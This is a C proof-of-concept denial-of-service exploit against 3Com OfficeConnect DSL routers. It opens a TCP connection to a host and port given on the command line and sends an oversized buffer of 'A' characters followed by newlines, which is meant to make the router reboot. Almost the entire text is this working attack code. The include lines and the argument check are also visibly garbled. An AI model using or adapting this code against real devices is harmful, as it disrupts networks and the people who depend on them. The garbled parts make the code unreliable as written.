Exploit:
/* 3com-DoS.c
*
* PoC DoS exploit for 3Com OfficeConnect DSL Routers.
* discovered by David F. Madrid.
*
* Successful exploitation of the vulnerability should cause the router to
* reboot. It is not believed that arbitrary code execution is possible -
* check advisory for more information.
*
* -shaun2k2
*/
#include
#include
#include
#include
#include
#include
int main(int argc, char *argv[]) {
if(argc printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - shaunige@yahoo.co.uk>\n\n");
printf("Usage: 3comDoS \n");
exit(-1);
}
int sock;
char explbuf[521];
struct sockaddr_in dest;
struct hostent *he;
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve %s!\n", argv[1]);
exit(-1);
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - shaunige@yahoo.co.uk>\n\n");
dest.sin_addr = *((struct in_addr *)he->h_addr);
dest.sin_port = htons(atoi(argv[2]));
dest.sin_family = AF_INET;
printf("[+] Crafting exploit buffer.\n");
memset(explbuf, 'A', 512);
memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);
if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) ==
-1) {
perror("connect()");
exit(-1);
}
printf("[+] Connected...Sending exploit buffer!\n");
send(sock, explbuf, strlen(explbuf), 0);
sleep(2);
close(sock);
printf("\n[+] Exploit buffer sent!\n");
return(0);
}